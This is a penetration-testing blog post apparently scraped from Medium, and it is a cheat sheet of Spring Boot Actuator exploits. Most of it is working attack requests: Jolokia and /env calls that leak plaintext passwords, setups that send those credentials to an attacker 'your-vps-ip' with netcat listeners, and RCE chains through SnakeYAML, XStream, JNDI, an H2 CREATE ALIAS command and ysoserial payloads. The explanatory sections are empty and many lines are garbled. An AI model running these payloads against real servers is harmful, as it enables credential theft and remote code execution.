Introduction to Spring Boot Related Vulnerabilities

Routing Knowledge

Version Knowledge

Version Interdependencies of Common Components:

Information Leakage

Leakage of routing address and interface call details

Route Exposed by Improper Configuration

/env,/actuator/env

/Jolokia

/trace

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 1)

POST /jolokiaContent-Type: application/json{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
POST /actuator/jolokiaContent-Type: application/json{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
POST /jolokiaContent-Type: application/json{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
POST /actuator/jolokiaContent-Type: application/json{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 2)

nc -lvk 80
POST /env
Content-Type: application/x-www-form-urlencoded
eureka .client .serviceUrl .defaultZone =http: //value:${security.user.password}@your-vps-ip
POST /actuator/env
Content- Type : application/json
{ "name" : "eureka.client.serviceUrl.defaultZone" , "value" : " http :// value : ${security.user.password} @your-vps-ip" }
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json
Authorization: Basic dmFsdWU6MTIzNDU2

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 3)

nc -lvk 80
POST /env 
Content-Type: application/x-www-form-urlencoded eureka .client .serviceUrl .defaultZone =http: //your-vps-ip/${security.user.password}
POST /actuator/envContent-Type: application/json{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}
POST /env
Content-Type: application/x-www-form-urlencodedeureka .client .serviceUrl .defaultZone =http: //your-vps-ip/${security.user.password}
POST /actuator/envContent-Type: application/json{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 4)

Remote Code Execution

White Label Error Page SpEL RCE

# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
result += hex(ord(x)) + ","
print(result.rstrip( ',' ))

Vulnerability Analysis:

http://127.0.0.1:9091/article?id=66 _

Spring Cloud SnakeYAML RCE

# Use python to quickly start the http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
!! javax.script.ScriptEngineManager [
!! java.net.URLClassLoader [[
!! java.net.URL [ " http : //your-vps-ip/example.jar " ] _ _ _ _ _ _
]]
]
POST /env
Content - Type : application/x- www- form - urlencoded
spring.cloud.bootstrap.location =http : //your-vps-ip/example.yml
POST /actuator/ env 
Content- Type: application/json
{ "name" : "spring.cloud.bootstrap.location" , " value" : " http : //your-vps-ip/example.yml"}
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Vulnerability Principle:

http://127.0.0.1:9092/env _

Eureka XStream Deserialization RCE

Conditions of use:

nc -lvp 443
POST /env
Content-Type: application/x-www-form-urlencoded
eureka .client .serviceUrl .defaultZone =http: //your-vps-ip/example
POST /actuator/ env 
Content- Type: application/json
{ "name" : "eureka.client.serviceUrl.defaultZone" , "value" : " http :// your - vps - ip / example " }
POST /refresh
Content - Type : application/x- www- form - urlencoded
POST /actuator/ refresh
Content- Type: application/json

Vulnerability Principle:

http://127.0.0.1:9093/env _

Jolokia Logback JNDI RCE

# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
< configuration >
< insertFromJNDI env-entry-name = "ldap://your-vps-ip:1389/JNDIObject" as = "appName" />
</ configuration >
javac - source 1.5 -target 1.5 JNDIObject.java
nc -lv 443

Vulnerability Principle:

Vulnerability Analysis:

http://127.0.0.1:9094/env _

Jolokia Realm JNDI RCE

# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
nc -lvp 443

Vulnerability principle:

Vulnerability Analysis:

http://127.0.0.1:9094/env _

h2 Database Query RCE

POST /envContent-Type: application/x-www-form-urlencodedspring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');
POST /actuator/envContent-Type: application/json{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

spring 1.x

POST /restart
Content-Type: application/x-www-form-urlencoded
POST /actuator/restart
Content-Type: application/json

Vulnerability Principle:

Vulnerability Analysis:

http://127.0.0.1:9096/actuator/env _ _ _ _ _ _ _ _

h2 Database Console JNDI RCE

javac - source 1.5 -target 1.5 JNDIObject.java
# Use python to quickly start the http server python2 -m SimpleHTTPServer 80 
python3 -m http.server 80
nc -lv 443

Vulnerability Analysis:

http://127.0.0.1:9096/h2-console _

MySQL Jdbc Deserialization RCE

java -jar ysoserial.jar CommonsCollections3 calc > payload.ser
POST /env
Content-Type: application/x-www-form-urlencoded
spring.datasource.url=corresponding property value
POST  /refreshContent-Type: application/x-www-form-urlencoded
POST /actuator/refresh
Content-Type: application/json

Vulnerability principle:

Vulnerability Analysis:

http://127.0.0.1:9097/actuator/env _ _ _ _ _ _ _ _
http://127.0.0.1:9097/product/list _ _ _ _ _ _ _ _

--

--

--

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
TutorialBoy

TutorialBoy

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.

More from Medium

The Bad Twin: a peculiar case of JWT exploitation scenario

Weakly Typed SQL Injection

A Study Notes of Exploit Spring Boot Actuator

The New King “Broken Access Control”